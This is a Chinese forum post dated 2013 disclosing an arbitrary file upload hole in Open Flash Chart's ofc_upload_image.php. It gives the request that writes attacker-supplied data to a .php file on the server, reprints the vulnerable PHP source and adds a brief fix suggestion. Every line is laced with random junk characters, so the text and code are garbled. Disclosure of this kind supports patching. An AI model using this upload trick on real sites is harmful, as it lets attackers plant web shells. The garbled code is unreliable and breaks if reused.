POST 数据漏洞文件执行任意后缀文件保存
, S9 K- p# P6 ~ 漏洞文件/chart/php-ofc-library/ofc_upload_image.php; R/ t) h) v9 V8 J5 Z- Y. y
! h% W' S$ y+ S- b! ?( n# z
利用:' e" H) [# H: S. B9 C" ~; n: p
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名0 S( A! A) Y# a4 t7 u- v4 \
]& B0 e h$ l3 P+ x6 ]Post任意数据
8 @! J8 Z* t8 d保存位置http://localhost/chart/tmp-upload-images/hfy.php
) d, }3 n6 I2 ~% p3 _, o5 G+ U7 V( f6 K* w9 F' Y! s
& U8 d; e; \; Z4 {& a7 ~7 X
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~& u" f9 O- r7 z T
- g4 I! ~. g9 M' N# `
<?php
0 P. D) [3 [9 F0 i
) Y/ ^7 i, u0 n) l4 @% `//7 |' F; L9 f' ?: |
// In Open Flash Chart -> save_image debug mode, you
: y o/ c/ N, T8 g0 _; D// will see the 'echo' text in a new window.! k6 B: n9 @; w x# m
//
6 q% I2 c+ H' N9 p9 D4 ] x
4 L5 r0 Y/ L* ]. r( P7 C1 o8 E/*+ k8 J+ S9 O8 J3 h @
$ m& n* @5 D. j
print_r( $_GET );$ C& k( t T* \" w
print_r( $_POST );% {; ?6 e% j( }6 ?0 U
print_r( $_FILES );3 i/ P7 S7 S2 f) Z& t; H9 l U9 ?
R5 y+ p% D8 ^
print_r( $GLOBALS );' b+ V" l6 v" l/ l9 h. g1 R; n
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );6 _7 v) h$ E9 Y& z6 V5 H
' ~4 b6 p' Y7 U2 q8 V# m+ U*/
: Q$ @+ ?+ J0 L8 t9 Z: \& \# L// default path for the image to be stored //
* l. x9 {! s+ V) d; I$default_path = '../tmp-upload-images/';
' l+ F# q9 j3 t, N- T1 n
9 c5 J/ l' S) r" lif (!file_exists($default_path)) mkdir($default_path, 0777, true);3 c! z# k; @; R h5 `5 G. v/ q4 j
7 V l9 j. g8 {) q; ~" ]4 m4 h& p// full path to the saved image including filename //6 R6 S+ J4 A5 z! T) O! r
$destination = $default_path . basename( $_GET[ 'name' ] );
1 {$ W! J4 J$ i* A: b L% ^8 U
0 s0 Z- m( K+ Q$ Hecho 'Saving your image to: '. $destination;; _: i: L* z; v- w f
// print_r( $_POST );4 z, l5 `: C) ], v3 @' o
// print_r( $_SERVER );
& n9 V$ Q. t7 Q% B4 N8 k) k// echo $HTTP_RAW_POST_DATA;3 p" Z, a. a& c, |( X% ?
! |/ A# e+ c0 y9 |+ |# L//
5 ]% |7 C! S- @8 c6 x7 ~// POST data is usually string data, but we are passing a RAW .png
' S2 R( a+ f2 _3 K1 i7 }( i8 M9 d// so PHP is a bit confused and $_POST is empty. But it has saved
% K8 [! B( m+ j/ T4 R// the raw bits into $HTTP_RAW_POST_DATA
7 [# Y# J7 s5 H( \, A//; U; h) q. O' c6 G! A
: T0 e A% X' ]4 k: a9 S2 o# f1 `$jfh = fopen($destination, 'w') or die("can't open file");2 R! K/ K; V- s
fwrite($jfh, $HTTP_RAW_POST_DATA);2 j& s" r+ f& n* o g3 G
fclose($jfh); O6 i2 O: @; `
5 d3 X3 d% B6 ~. w/ W//9 k3 r0 o' x L! n! J2 C7 m' T0 k9 V# g
// LOOK:; j0 Q1 O/ S. ~# ^6 y* R; {9 |. }
//1 s& ^- Y2 c$ G5 V
exit();, q6 K; m& }0 C% k- ]/ R
//
& j0 t0 ]$ U7 E) ]$ U4 \$ T" u// PHP5:0 H1 U) q0 W! d& q6 |. {% G
//
" V: }+ h3 U/ c- J1 N& F7 s
^; |9 h# _& [# a( K6 ]0 j+ V. v3 l- t/ D2 i% D
// default path for the image to be stored //& V1 c/ ]2 Q5 o' G; r# |$ b
$default_path = 'tmp-upload-images/';
$ `7 i7 M% c+ y' r9 y- d
" l% Y1 w3 w5 h2 E4 Fif (!file_exists($default_path)) mkdir($default_path, 0777, true);
6 w: l" L5 m, k$ d3 M+ w: l
! r5 h+ f( u' y" C; i3 z* P& l% B// full path to the saved image including filename //
+ T! S' g! W9 V$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
3 S* }& |* \, e4 t% h0 L3 W
7 C# E" o8 R4 H4 m) F9 P- B// move the image into the specified directory /// X, h' u$ Z$ A3 D( ?. V$ D: U
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {+ s8 {) R6 T% @6 t, ^5 H- F3 s
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";" V& h% ^3 b% i- }; F
} else {
?0 ~3 f+ A# ?4 y v, M echo "FILE UPLOAD FAILED";
: b4 ?& E: g. m/ w}
; {( [# N% r4 \. X9 R
# V3 e7 B! m4 j1 R4 ?) W0 v( X$ ~$ h6 y9 Y* a
?>+ O+ V. @: p) V
7 i5 @1 G* }! P9 \; m+ y0 ~
" J6 n$ u; x5 R4 a
2 e6 ]7 H$ N# W3 c) c! z! F2 I$ e1 u+ ]5 Y" c; T# H9 q
5 c8 W$ w% i9 {. [% [0 }# `0 i
A5 D# h% g& P" o' l" y+ F
修复方案:
5 M( [, X9 G- B6 K这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 + n+ y/ H* x3 B
+ `* @# D6 A! {: m
0 [% X( _! a) s! z
7 F, C1 N5 o' D3 c% a! f4 U+ V# _' z0 l+ S( e6 m- ^ C
|
发表于 2013-2-23 12:38:58
收藏
支持
反对